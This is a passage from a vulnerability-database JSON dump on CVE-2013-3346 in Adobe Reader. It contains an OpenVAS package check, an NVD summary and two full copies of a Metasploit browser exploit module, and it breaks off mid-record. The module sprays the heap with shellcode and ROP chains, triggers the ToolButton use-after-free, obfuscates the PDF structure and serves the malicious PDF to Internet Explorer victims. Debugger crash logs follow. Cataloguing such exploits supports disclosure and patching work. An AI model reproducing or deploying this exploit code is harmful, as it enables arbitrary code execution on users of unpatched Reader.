"metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_TOOLBUTTON", "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_TOOLBUTTON"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:124464", "PACKETSTORM:124463"]}, {"type": "zdi", "idList": ["ZDI-13-212"]}, {"type": "seebug", "idList": ["SSV:61170"]}, {"type": "canvas", "idList": ["ACROBAT_TOOLBUTTON"]}, {"type": "zdt", "idList": ["1337DAY-ID-21684"]}, {"type": "thn", "idList": ["THN:1EA4AB16D6C3A0518A078CC8C9304FA5"]}, {"type": "threatpost", "idList": ["THREATPOST:B27D20AA97E34E737FEFFB96CFD7603B"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803616", "OPENVAS:1361412562310803617", "OPENVAS:1361412562310803614", "OPENVAS:1361412562310803613", "OPENVAS:1361412562310803615"]}, {"type": "kaspersky", "idList": ["KLA10457"]}], "modified": "2019-05-29T18:36:08"}, "score": {"value": 8.8, "vector": "NONE", "modified": "2019-05-29T18:36:08"}, "vulnersScore": 8.8}, "objectVersion": "1.3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201309-10.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121024\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:25:50 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201309-10\");\n script_tag(name:\"insight\", value:\"An unspecified vulnerability exists in Adobe Reader.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201309-10\");\n script_cve_id(\"CVE-2013-3346\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201309-10\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 9.5.5\"), vulnerable: make_list(\"lt 9.5.5\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "naslFamily": "Gentoo Local Security Checks", "pluginID": "1361412562310121024", "scheme": null}

{"cve": [{"lastseen": "2019-05-29T18:13:03", "bulletinFamily": "NVD", "description": "Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-2736, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.", "modified": "2017-09-19T01:36:00", "id": "CVE-2013-3346", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3346", "published": "2013-08-30T20:55:00", "title": "CVE-2013-3346", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T17:39:30", "bulletinFamily": "exploit", "description": "CVE ID:CVE-2013-3346\r\n\r\nAdobe Reader\u548cAcrobat\u4e2d\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u6267\u884c\u4efb\u610f\u4ee3\u7801\u6216\u9020\u6210\u62d2\u7edd\u670d\u52a1\uff08\u5185\u5b58\u635f\u574f\uff09\u3002\n0\nAdobe Reader\u548cAcrobat 9.5.5\u4e4b\u524d\u76849.x\u7248\u672c\uff0c10.1.7\u4e4b\u524d\u768410.x\u7248\u672c\uff0c11.0.03\u4e4b\u524d\u768411.x\u7248\u672c\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nAdobe\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.adobe.com/support/security/bulletins/apsb13-15.html", "modified": "2013-12-18T00:00:00", "published": "2013-12-18T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61170", "id": "SSV:61170", "type": "seebug", "title": "Adobe Reader\u548cAcrobat\u5185\u5b58\u635f\u574f\u6f0f\u6d1e", "sourceData": "\n ##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => "Adobe Reader ToolButton Use After Free",\r\n 'Description' => %q{\r\n This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6\r\n and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where\r\n the cEnable callback can be used to early free the object memory. Later use of the object\r\n allows triggering the use after free condition. This module has been tested successfully\r\n on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in\r\n November, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order\r\n to exploit Adobe Reader 9 the fileformat version of the exploit can be used.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Soroush Dalili', # Vulnerability discovery\r\n 'Unknown', # Exploit in the wild\r\n 'sinn3r', # Metasploit module\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-3346' ],\r\n [ 'OSVDB', '96745' ],\r\n [ 'ZDI', '13-212' ],\r\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ],\r\n [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'BadChars' => "\\x00",\r\n 'DisableNops' => true\r\n },\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :os_flavor => Msf::OperatingSystems::WindowsVersions::XP,\r\n :ua_name => Msf::HttpClients::IE\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows XP / IE / Adobe Reader 10/11', { } ],\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => "Aug 08 2013",\r\n 'DefaultTarget' => 0))\r\n \r\n end\r\n \r\n def on_request_exploit(cli, request, target_info)\r\n print_status("request: #{request.uri}")\r\n js_data = make_js(cli, target_info)\r\n # Create the pdf\r\n pdf = make_pdf(js_data)\r\n print_status("Sending PDF...")\r\n send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\r\n end\r\n \r\n def make_js(cli, target_info)\r\n # CreateFileMappingA + MapViewOfFile + memcpy rop chain\r\n rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))\r\n rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))\r\n escaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info))\r\n \r\n js = %Q|\r\nfunction heapSpray(str, str_addr, r_addr) {\r\n var aaa = unescape("%u0c0c");\r\n aaa += aaa;\r\n while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa;\r\n var i1 = r_addr - 0x24;\r\n var bbb = aaa.substring(0, i1 / 2);\r\n var sa = str_addr;\r\n while (sa.length < (0x0c0c - r_addr)) sa += sa;\r\n bbb += sa;\r\n bbb += aaa;\r\n var i11 = 0x0c0c - 0x24;\r\n bbb = bbb.substring(0, i11 / 2);\r\n bbb += str;\r\n bbb += aaa;\r\n var i2 = 0x4000 + 0xc000;\r\n var ccc = bbb.substring(0, i2 / 2);\r\n while (ccc.length < (0x40000 + 0x40000)) ccc += ccc;\r\n var i3 = (0x1020 - 0x08) / 2;\r\n var ddd = ccc.substring(0, 0x80000 - i3);\r\n var eee = new Array();\r\n for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s";\r\n return;\r\n}\r\nvar shellcode = unescape("#{escaped_payload}");\r\nvar executable = "";\r\nvar rop10 = unescape("#{rop_10}");\r\nvar rop11 = unescape("#{rop_11}");\r\nvar r11 = false;\r\nvar vulnerable = true;\r\n \r\nvar obj_size;\r\nvar rop;\r\nvar ret_addr;\r\nvar rop_addr;\r\nvar r_addr;\r\n \r\nif (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {\r\n obj_size = 0x360 + 0x1c;\r\n rop = rop10;\r\n rop_addr = unescape("%u08e4%u0c0c");\r\n r_addr = 0x08e4;\r\n ret_addr = unescape("%ua8df%u4a82");\r\n} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {\r\n r11 = true;\r\n obj_size = 0x370;\r\n rop = rop11;\r\n rop_addr = unescape("%u08a8%u0c0c");\r\n r_addr = 0x08a8;\r\n ret_addr = unescape("%u8003%u4a84");\r\n} else {\r\n vulnerable = false;\r\n}\r\n \r\nif (vulnerable) {\r\n var payload = rop + shellcode;\r\n heapSpray(payload, ret_addr, r_addr);\r\n \r\n var part1 = "";\r\n if (!r11) {\r\n for (i = 0; i < 0x1c / 2; i++) part1 += unescape("%u4141");\r\n }\r\n part1 += rop_addr;\r\n var part2 = "";\r\n var part2_len = obj_size - part1.length * 2;\r\n for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape("%u4141");\r\n var arr = new Array();\r\n \r\n removeButtonFunc = function () {\r\n app.removeToolButton({\r\n cName: "evil"\r\n });\r\n \r\n for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);\r\n }\r\n \r\n addButtonFunc = function () {\r\n app.addToolButton({\r\n cName: "xxx",\r\n cExec: "1",\r\n cEnable: "removeButtonFunc();"\r\n });\r\n }\r\n \r\n app.addToolButton({\r\n cName: "evil",\r\n cExec: "1",\r\n cEnable: "addButtonFunc();"\r\n });\r\n}\r\n|\r\n \r\n js\r\n end\r\n \r\n def RandomNonASCIIString(count)\r\n result = ""\r\n count.times do\r\n result << (rand(128) + 128).chr\r\n end\r\n result\r\n end\r\n \r\n def ioDef(id)\r\n "%d 0 obj \\n" % id\r\n end\r\n \r\n def ioRef(id)\r\n "%d 0 R" % id\r\n end\r\n \r\n \r\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n def nObfu(str)\r\n #return str\r\n result = ""\r\n str.scan(/./u) do |c|\r\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n result << "#%x" % c.unpack("C*")[0]\r\n else\r\n result << c\r\n end\r\n end\r\n result\r\n end\r\n \r\n \r\n def ASCIIHexWhitespaceEncode(str)\r\n result = ""\r\n whitespace = ""\r\n str.each_byte do |b|\r\n result << whitespace << "%02x" % b\r\n whitespace = " " * (rand(3) + 1)\r\n end\r\n result << ">"\r\n end\r\n \r\n \r\n def make_pdf(js)\r\n xref = []\r\n eol = "\\n"\r\n endobj = "endobj" << eol\r\n \r\n # Randomize PDF version?\r\n pdf = "%PDF-1.5" << eol\r\n pdf << "%" << RandomNonASCIIString(4) << eol\r\n \r\n # catalog\r\n xref << pdf.length\r\n pdf << ioDef(1) << nObfu("<<") << eol\r\n pdf << nObfu("/Pages ") << ioRef(2) << eol\r\n pdf << nObfu("/Type /Catalog") << eol\r\n pdf << nObfu("/OpenAction ") << ioRef(4) << eol\r\n # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load\r\n pdf << nObfu("/AcroForm ") << ioRef(6) << eol\r\n pdf << nObfu(">>") << eol\r\n pdf << endobj\r\n \r\n # pages array\r\n xref << pdf.length\r\n pdf << ioDef(2) << nObfu("<<") << eol\r\n pdf << nObfu("/Kids [") << ioRef(3) << "]" << eol\r\n pdf << nObfu("/Count 1") << eol\r\n pdf << nObfu("/Type /Pages") << eol\r\n pdf << nObfu(">>") << eol\r\n pdf << endobj\r\n \r\n # page 1\r\n xref << pdf.length\r\n pdf << ioDef(3) << nObfu("<<") << eol\r\n pdf << nObfu("/Parent ") << ioRef(2) << eol\r\n pdf << nObfu("/Type /Page") << eol\r\n pdf << nObfu(">>") << eol # end obj dict\r\n pdf << endobj\r\n \r\n # js action\r\n xref << pdf.length\r\n pdf << ioDef(4) << nObfu("<<")\r\n pdf << nObfu("/Type/Action/S/JavaScript/JS ") + ioRef(5)\r\n pdf << nObfu(">>") << eol\r\n pdf << endobj\r\n \r\n # js stream\r\n xref << pdf.length\r\n compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n pdf << ioDef(5) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol\r\n pdf << "stream" << eol\r\n pdf << compressed << eol\r\n pdf << "endstream" << eol\r\n pdf << endobj\r\n \r\n ###\r\n # The following form related data is required to get icucnv36.dll / icucnv40.dll to load\r\n ###\r\n \r\n # form object\r\n xref << pdf.length\r\n pdf << ioDef(6)\r\n pdf << nObfu("<</XFA ") << ioRef(7) << nObfu(">>") << eol\r\n pdf << endobj\r\n \r\n # form stream\r\n xfa = <<-EOF\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">\r\n<config xmlns="http://www.xfa.org/schema/xci/2.6/">\r\n<present><pdf><interactive>1</interactive></pdf></present>\r\n</config>\r\n<template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">\r\n<subform name="form1" layout="tb" locale="en_US">\r\n<pageSet></pageSet>\r\n</subform></template></xdp:xdp>\r\n EOF\r\n \r\n xref << pdf.length\r\n pdf << ioDef(7) << nObfu("<</Length %s>>" % xfa.length) << eol\r\n pdf << "stream" << eol\r\n pdf << xfa << eol\r\n pdf << "endstream" << eol\r\n pdf << endobj\r\n \r\n ###\r\n # end form stuff for icucnv36.dll / icucnv40.dll\r\n ###\r\n \r\n \r\n # trailing stuff\r\n xrefPosition = pdf.length\r\n pdf << "xref" << eol\r\n pdf << "0 %d" % (xref.length + 1) << eol\r\n pdf << "0000000000 65535 f" << eol\r\n xref.each do |index|\r\n pdf << "%010d 00000 n" % index << eol\r\n end\r\n \r\n pdf << "trailer" << eol\r\n pdf << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol\r\n \r\n pdf << "startxref" << eol\r\n pdf << xrefPosition.to_s() << eol\r\n \r\n pdf << "%%EOF" << eol\r\n pdf\r\n end\r\n \r\nend\r\n \r\n \r\n=begin\r\n \r\n* crash Adobe Reader 10.1.4\r\n \r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001\r\neip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213\r\nAcroRd32_60000000!PDFLTerm+0xbb7cd:\r\n604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=????????\r\n \r\n* crash Adobe Reader 11.0.2\r\n \r\n(940.d70): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files\\Adobe\\Reader 11.0\\Reader\\AcroRd32.dll -\r\neax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000\r\neip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213\r\nAcroRd32_60000000!DllCanUnloadNow+0x1493ae:\r\n60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=????????\r\n \r\n=end\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-61170", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:32", "bulletinFamily": "exploit", "description": "", "modified": "2013-12-17T00:00:00", "published": "2013-12-17T00:00:00", "href": "https://packetstormsecurity.com/files/124464/Adobe-Reader-ToolButton-Use-After-Free.html", "id": "PACKETSTORM:124464", "type": "packetstorm", "title": "Adobe Reader ToolButton Use After Free", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Adobe Reader ToolButton Use After Free\", \n'Description' => %q{ \nThis module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 \nand 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where \nthe cEnable callback can be used to early free the object memory. Later use of the object \nallows triggering the use after free condition. This module has been tested successfully \non Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in \nNovember, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order \nto exploit Adobe Reader 9 the fileformat version of the exploit can be used. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Soroush Dalili', # Vulnerability discovery \n'Unknown', # Exploit in the wild \n'sinn3r', # Metasploit module \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2013-3346' ], \n[ 'OSVDB', '96745' ], \n[ 'ZDI', '13-212' ], \n[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ], \n[ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ] \n], \n'Platform' => 'win', \n'Arch' => ARCH_X86, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n'DisableNops' => true \n}, \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:os_name => Msf::OperatingSystems::WINDOWS, \n:os_flavor => Msf::OperatingSystems::WindowsVersions::XP, \n:ua_name => Msf::HttpClients::IE \n}, \n'Targets' => \n[ \n[ 'Windows XP / IE / Adobe Reader 10/11', { } ], \n], \n'Privileged' => false, \n'DisclosureDate' => \"Aug 08 2013\", \n'DefaultTarget' => 0)) \n \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"request: #{request.uri}\") \njs_data = make_js(cli, target_info) \n# Create the pdf \npdf = make_pdf(js_data) \nprint_status(\"Sending PDF...\") \nsend_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' }) \nend \n \ndef make_js(cli, target_info) \n# CreateFileMappingA + MapViewOfFile + memcpy rop chain \nrop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' })) \nrop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' })) \nescaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info)) \n \njs = %Q| \nfunction heapSpray(str, str_addr, r_addr) { \nvar aaa = unescape(\"%u0c0c\"); \naaa += aaa; \nwhile ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa; \nvar i1 = r_addr - 0x24; \nvar bbb = aaa.substring(0, i1 / 2); \nvar sa = str_addr; \nwhile (sa.length < (0x0c0c - r_addr)) sa += sa; \nbbb += sa; \nbbb += aaa; \nvar i11 = 0x0c0c - 0x24; \nbbb = bbb.substring(0, i11 / 2); \nbbb += str; \nbbb += aaa; \nvar i2 = 0x4000 + 0xc000; \nvar ccc = bbb.substring(0, i2 / 2); \nwhile (ccc.length < (0x40000 + 0x40000)) ccc += ccc; \nvar i3 = (0x1020 - 0x08) / 2; \nvar ddd = ccc.substring(0, 0x80000 - i3); \nvar eee = new Array(); \nfor (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + \"s\"; \nreturn; \n} \nvar shellcode = unescape(\"#{escaped_payload}\"); \nvar executable = \"\"; \nvar rop10 = unescape(\"#{rop_10}\"); \nvar rop11 = unescape(\"#{rop_11}\"); \nvar r11 = false; \nvar vulnerable = true; \n \nvar obj_size; \nvar rop; \nvar ret_addr; \nvar rop_addr; \nvar r_addr; \n \nif (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) { \nobj_size = 0x360 + 0x1c; \nrop = rop10; \nrop_addr = unescape(\"%u08e4%u0c0c\"); \nr_addr = 0x08e4; \nret_addr = unescape(\"%ua8df%u4a82\"); \n} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) { \nr11 = true; \nobj_size = 0x370; \nrop = rop11; \nrop_addr = unescape(\"%u08a8%u0c0c\"); \nr_addr = 0x08a8; \nret_addr = unescape(\"%u8003%u4a84\"); \n} else { \nvulnerable = false; \n} \n \nif (vulnerable) { \nvar payload = rop + shellcode; \nheapSpray(payload, ret_addr, r_addr); \n \nvar part1 = \"\"; \nif (!r11) { \nfor (i = 0; i < 0x1c / 2; i++) part1 += unescape(\"%u4141\"); \n} \npart1 += rop_addr; \nvar part2 = \"\"; \nvar part2_len = obj_size - part1.length * 2; \nfor (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape(\"%u4141\"); \nvar arr = new Array(); \n \nremoveButtonFunc = function () { \napp.removeToolButton({ \ncName: \"evil\" \n}); \n \nfor (i = 0; i < 10; i++) arr[i] = part1.concat(part2); \n} \n \naddButtonFunc = function () { \napp.addToolButton({ \ncName: \"xxx\", \ncExec: \"1\", \ncEnable: \"removeButtonFunc();\" \n}); \n} \n \napp.addToolButton({ \ncName: \"evil\", \ncExec: \"1\", \ncEnable: \"addButtonFunc();\" \n}); \n} \n| \n \njs \nend \n \ndef RandomNonASCIIString(count) \nresult = \"\" \ncount.times do \nresult << (rand(128) + 128).chr \nend \nresult \nend \n \ndef ioDef(id) \n\"%d 0 obj \\n\" % id \nend \n \ndef ioRef(id) \n\"%d 0 R\" % id \nend \n \n \n#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ \ndef nObfu(str) \n#return str \nresult = \"\" \nstr.scan(/./u) do |c| \nif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' \nresult << \"#%x\" % c.unpack(\"C*\")[0] \nelse \nresult << c \nend \nend \nresult \nend \n \n \ndef ASCIIHexWhitespaceEncode(str) \nresult = \"\" \nwhitespace = \"\" \nstr.each_byte do |b| \nresult << whitespace << \"%02x\" % b \nwhitespace = \" \" * (rand(3) + 1) \nend \nresult << \">\" \nend \n \n \ndef make_pdf(js) \nxref = [] \neol = \"\\n\" \nendobj = \"endobj\" << eol \n \n# Randomize PDF version? \npdf = \"%PDF-1.5\" << eol \npdf << \"%\" << RandomNonASCIIString(4) << eol \n \n# catalog \nxref << pdf.length \npdf << ioDef(1) << nObfu(\"<<\") << eol \npdf << nObfu(\"/Pages \") << ioRef(2) << eol \npdf << nObfu(\"/Type /Catalog\") << eol \npdf << nObfu(\"/OpenAction \") << ioRef(4) << eol \n# The AcroForm is required to get icucnv36.dll / icucnv40.dll to load \npdf << nObfu(\"/AcroForm \") << ioRef(6) << eol \npdf << nObfu(\">>\") << eol \npdf << endobj \n \n# pages array \nxref << pdf.length \npdf << ioDef(2) << nObfu(\"<<\") << eol \npdf << nObfu(\"/Kids [\") << ioRef(3) << \"]\" << eol \npdf << nObfu(\"/Count 1\") << eol \npdf << nObfu(\"/Type /Pages\") << eol \npdf << nObfu(\">>\") << eol \npdf << endobj \n \n# page 1 \nxref << pdf.length \npdf << ioDef(3) << nObfu(\"<<\") << eol \npdf << nObfu(\"/Parent \") << ioRef(2) << eol \npdf << nObfu(\"/Type /Page\") << eol \npdf << nObfu(\">>\") << eol # end obj dict \npdf << endobj \n \n# js action \nxref << pdf.length \npdf << ioDef(4) << nObfu(\"<<\") \npdf << nObfu(\"/Type/Action/S/JavaScript/JS \") + ioRef(5) \npdf << nObfu(\">>\") << eol \npdf << endobj \n \n# js stream \nxref << pdf.length \ncompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) \npdf << ioDef(5) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol \npdf << \"stream\" << eol \npdf << compressed << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n### \n# The following form related data is required to get icucnv36.dll / icucnv40.dll to load \n### \n \n# form object \nxref << pdf.length \npdf << ioDef(6) \npdf << nObfu(\"<</XFA \") << ioRef(7) << nObfu(\">>\") << eol \npdf << endobj \n \n# form stream \nxfa = <<-EOF \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\"> \n<config xmlns=\"http://www.xfa.org/schema/xci/2.6/\"> \n<present><pdf><interactive>1</interactive></pdf></present> \n</config> \n<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.6/\"> \n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\"> \n<pageSet></pageSet> \n</subform></template></xdp:xdp> \nEOF \n \nxref << pdf.length \npdf << ioDef(7) << nObfu(\"<</Length %s>>\" % xfa.length) << eol \npdf << \"stream\" << eol \npdf << xfa << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n### \n# end form stuff for icucnv36.dll / icucnv40.dll \n### \n \n \n# trailing stuff \nxrefPosition = pdf.length \npdf << \"xref\" << eol \npdf << \"0 %d\" % (xref.length + 1) << eol \npdf << \"0000000000 65535 f\" << eol \nxref.each do |index| \npdf << \"%010d 00000 n\" % index << eol \nend \n \npdf << \"trailer\" << eol \npdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol \n \npdf << \"startxref\" << eol \npdf << xrefPosition.to_s() << eol \n \npdf << \"%%EOF\" << eol \npdf \nend \n \nend \n \n \n=begin \n \n* crash Adobe Reader 10.1.4 \n \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \neax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001 \neip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213 \nAcroRd32_60000000!PDFLTerm+0xbb7cd: \n604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=???????? \n \n* crash Adobe Reader 11.0.2 \n \n(940.d70): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files\\Adobe\\Reader 11.0\\Reader\\AcroRd32.dll - \neax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000 \neip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213 \nAcroRd32_60000000!DllCanUnloadNow+0x1493ae: \n60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=???????? \n \n=end \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/124464/windows-browser-adobe_toolbutton.rb.txt"}, {"lastseen": "2016-12-05T22:16:24", "bulletinFamily": "exploit", "description": "", "modified": 